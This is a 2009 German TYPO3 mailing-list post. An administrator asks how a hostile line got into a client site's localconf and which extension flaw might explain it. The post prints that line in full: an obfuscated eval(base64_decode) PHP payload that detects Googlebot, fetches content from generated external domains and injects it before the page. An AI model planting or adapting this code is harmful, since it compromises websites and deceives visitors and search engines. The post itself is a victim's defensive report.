[TYPO3-german] Security Problem
Thomas Roediger
tom.roediger at web.de
Thu Jun 4 13:50:34 CEST 2009
Hallo,
die Seite eines Kunden taucht bei Google auf einmal unter den
merkwürdigsten Begriffen auf. Offenbar hat sich Code eingeschlichen, der
bei Bot-Besuchen vor die eigentliche Typo3-Ausgabe noch weitere Inhalte
einfügt, und zwar noch vor der Doc-Type-Deklaration.
In der localconf konnte eine Zeile ausfindig gemacht werden, die
vermutlich dafür verantwortlich ist.
eval(base64_decode('DQokXzQzOWVjMWNiMGYxNjU2YzY2MTdmNDFkODhjZjk0ODMwID0gY2hyKDExNSkuY2hyKDExNykuY2hyKDk4KS5jaHIoMTE1KS5jaHIoMTE2KS5jaHIoMTE0KTsNCiRfMjkzODI5N2RhM2I5YTgzNDAzMDcwNWIzYWE1OWQ5M2EgPSBjaHIoMTA5KS5jaHIoMTAwKS5jaHIoNTMpOw0KJF9iYTMwNDI4YjZjMDQ5MjA4YTc2NjU3YzY0ODBiN2RkZiA9IGNocigxMDIpLmNocigxMTUpLmNocigxMTEpLmNocig5OSkuY2hyKDEwNykuY2hyKDExMSkuY2hyKDExMikuY2hyKDEwMSkuY2hyKDExMCk7DQokX2VjYWE3NTk2YjQzOWI5YWY2MGNjOTgzYjIwNjdmYWJjID0gY2hyKDEwMikuY2hyKDExMikuY2hyKDExNykuY2hyKDExNikuY2hyKDExNSk7DQokXzkxNTg4ZGI1NTNhZDRiOGNjNjI0ZDFjZjZmYWRmMzY4ID0gY2hyKDEwMikuY2hyKDEwMykuY2hyKDEwMSkuY2hyKDExNikuY2hyKDExNSk7DQokXzFkMzQyYmM4YTg5OTBhYWUxZWQyOWI1MmZkNTEzMzhjID0gY2hyKDExNSkuY2hyKDExNikuY2hyKDExNCkuY2hyKDExNSkuY2hyKDExNikuY2hyKDExNCk7DQokX2EzMjBlYjYwNjUxYjI5MWNhNDc5ZjQzYTg4NTZiNzNhID0gY2hyKDk1KS5jaHIoODMpLmNocig2OSkuY2hyKDgyKS5jaHIoODYpLmNocig2OSkuY2hyKDgyKTsNCiRfNWE2NzIzNjQ3NDNlYmExYmMwNzM2M2U0YmZjZWQwNWMgPSAkJF9hMzIwZWI2MDY1MWIyOTFjYTQ3OWY0M2E4ODU2YjczYTsNCg0KaWYoJF8xZDM0MmJjOGE4O
TkwYWFlMWVkMjliNTJmZDUxMzM4YygkXzVhNjcyMzY0NzQzZWJhMWJjMDczNjNlNGJmY2VkMDVjW2Nocig3MikuY2hyKDg0KS5jaHIoODQpLmNocig4MCkuY2hyKDk1KS5jaHIoODUpLmNocig4MykuY2hyKDY5KS5jaHIoODIpLmNocig5NSkuY2hyKDY1KS5jaHIoNzEpLmNocig2OSkuY2hyKDc4KS5jaHIoODQpXSwgY2hyKDcxKS5jaHIoMTExKS5jaHIoMTExKS5jaHIoMTAzKS5jaHIoMTA4KS5jaHIoMTAxKS5jaHIoOTgpLmNocigxMTEpLmNocigxMTYpKSkgew0KIGZvcigkX2EyZWZlZjZjM2UwYzY1OTI2NmEzNjEyZjA4ZTBmMjE5PTQ1ODU2NzskX2EyZWZlZjZjM2UwYzY1OTI2NmEzNjEyZjA4ZTBmMjE5PDQ1ODU3NTskX2EyZWZlZjZjM2UwYzY1OTI2NmEzNjEyZjA4ZTBmMjE5KyspIHsNCiAgJF8zN2FhNWYxNDlhNjU3MmU3ZmIwM2ViMThlMTUwYzZkYyA9ICRfNDM5ZWMxY2IwZjE2NTZjNjYxN2Y0MWQ4OGNmOTQ4MzAoJF8yOTM4Mjk3ZGEzYjlhODM0MDMwNzA1YjNhYTU5ZDkzYSgkX2EyZWZlZjZjM2UwYzY1OTI2NmEzNjEyZjA4ZTBmMjE5KSwgMCwgMTYpIC4gY2hyKDQ2KS5jaHIoMTA1KS5jaHIoMTEwKS5jaHIoMTAyKS5jaHIoMTExKTsNCiAgJF8wMDJhOGM1MDhiOGUyMzkyZTYwYmI5ZmZlZWNlNDZjMD0kX2JhMzA0MjhiNmMwNDkyMDhhNzY2NTdjNjQ4MGI3ZGRmKCRfMzdhYTVmMTQ5YTY1NzJlN2ZiMDNlYjE4ZTE1MGM2ZGMsIGNocig1NikuY2hyKDQ4KSk7DQogIGlmKCEkXzAwMmE4YzUwOGI4ZTI
zOTJlNjBiYjlmZmVlY2U0NmMwKSANCiAgIGNvbnRpbnVlOw0KICAkX2VjYWE3NTk2YjQzOWI5YWY2MGNjOTgzYjIwNjdmYWJjKCRfMDAyYThjNTA4YjhlMjM5MmU2MGJiOWZmZWVjZTQ2YzAsIGNocig3MSkuY2hyKDY5KS5jaHIoODQpLmNocigzMikuY2hyKDQ3KS5jaHIoNTcpLmNocigxMDApLmNocigxMDApLmNocigxMDApLmNocigxMDIpLmNocig1MCkuY2hyKDk3KS5jaHIoNTIpLmNocigxMDIpLmNocig1NSkuY2hyKDEwMCkuY2hyKDU3KS5jaHIoNTIpLmNocig1MykuY2hyKDU3KS5jaHIoNTIpLmNocigxMDEpLmNocig5OSkuY2hyKDUwKS5jaHIoMTAxKS5jaHIoOTcpLmNocig1NykuY2hyKDU2KS5jaHIoNTIpLmNocig0OCkuY2hyKDU1KS5jaHIoOTcpLmNocig1MikuY2hyKDQ5KS5jaHIoNDgpLmNocigxMDEpLmNocig0OSkuY2hyKDMyKS5jaHIoNzIpLmNocig4NCkuY2hyKDg0KS5jaHIoODApLmNocig0NykuY2hyKDQ5KS5jaHIoNDYpLmNocig0OSkuIlxyXG4iLmNocig3MikuY2hyKDExMSkuY2hyKDExNSkuY2hyKDExNikuY2hyKDU4KS5jaHIoMzIpLiRfMzdhYTVmMTQ5YTY1NzJlN2ZiMDNlYjE4ZTE1MGM2ZGMuIlxyXG4iLmNocig4MikuY2hyKDEwMSkuY2hyKDEwMikuY2hyKDEwMSkuY2hyKDExNCkuY2hyKDEwMSkuY2hyKDExNCkuY2hyKDU4KS5jaHIoMzIpLmNocigxMDQpLmNocigxMTYpLmNocigxMTYpLmNocigxMTIpLmNocig1OCkuY2hyKDQ3KS5jaHIoNDcpIC4gJF81YTY3MjM2NDc0M2ViY
TFiYzA3MzYzZTRiZmNlZDA1Y1tjaHIoODMpLmNocig2OSkuY2hyKDgyKS5jaHIoODYpLmNocig2OSkuY2hyKDgyKS5jaHIoOTUpLmNocig3OCkuY2hyKDY1KS5jaHIoNzcpLmNocig2OSldIC4gJCRfYTMyMGViNjA2NTFiMjkxY2E0NzlmNDNhODg1NmI3M2FbY2hyKDgyKS5jaHIoNjkpLmNocig4MSkuY2hyKDg1KS5jaHIoNjkpLmNocig4MykuY2hyKDg0KS5jaHIoOTUpLmNocig4NSkuY2hyKDgyKS5jaHIoNzMpXS4iXHJcblxyXG4iKTsNCiAgJF9mYzVjOTQ2MmU1ZTc4YTkzYmRlN2RmMzE4MmQyZjFlZT0wOw0KICB3aGlsZSgkX2Y0MWI4YTdlZWM5ZTEzMzM5ZDI3ZDZmODYxOTNiZGM0ID0gJF85MTU4OGRiNTUzYWQ0YjhjYzYyNGQxY2Y2ZmFkZjM2OCgkXzAwMmE4YzUwOGI4ZTIzOTJlNjBiYjlmZmVlY2U0NmMwLCAxMDI0KSkgew0KICAgaWYoJF9mYzVjOTQ2MmU1ZTc4YTkzYmRlN2RmMzE4MmQyZjFlZSkgew0KICAgIGlmKCRfMWQzNDJiYzhhODk5MGFhZTFlZDI5YjUyZmQ1MTMzOGMoJF9mNDFiOGE3ZWVjOWUxMzMzOWQyN2Q2Zjg2MTkzYmRjNCxjaHIoNDUpLmNocig0NSkuY2hyKDQ1KS5jaHIoNDUpLmNocig0NSkpKXsNCiAgICAgYnJlYWs7DQogICAgfQ0KICAgIGVjaG8oJF9mNDFiOGE3ZWVjOWUxMzMzOWQyN2Q2Zjg2MTkzYmRjNCk7IA0KICAgfQ0KICAgaWYoJF8xZDM0MmJjOGE4OTkwYWFlMWVkMjliNTJmZDUxMzM4YygkX2Y0MWI4YTdlZWM5ZTEzMzM5ZDI3ZDZmODYxOTNiZGM0LGNocig0NSkuY2h
yKDQ1KS5jaHIoNDUpLmNocig0NSkuY2hyKDQ1KSkpIHsNCiAgICAkX2ZjNWM5NDYyZTVlNzhhOTNiZGU3ZGYzMTgyZDJmMWVlPTE7DQogICAgY29udGludWU7DQogICB9DQogIH0NCiAgaWYoJF9mYzVjOTQ2MmU1ZTc4YTkzYmRlN2RmMzE4MmQyZjFlZSkNCiAgIGJyZWFrOw0KIH0NCn0='));
Die Frage ist jetzt: Hat jemand eine Idee, über welchen Weg das dort
rein gekommen sein kann, welche Extension für einen Fehler bekannt ist,
der es möglich macht beliebige Dateien oder speziell die localconf zu
modifizieren? Die Typo3-Version ist 4.1.10.
Logins auf dem Server sind übrigens nur mit VPN möglich, so das ein
allgemeiner Serverhack zwar nicht ausgeschlossen werden kann, aber eher
unwahrscheinlich ist.
Viele Grüße,
Thomas Rödiger
More information about the TYPO3-german
mailing list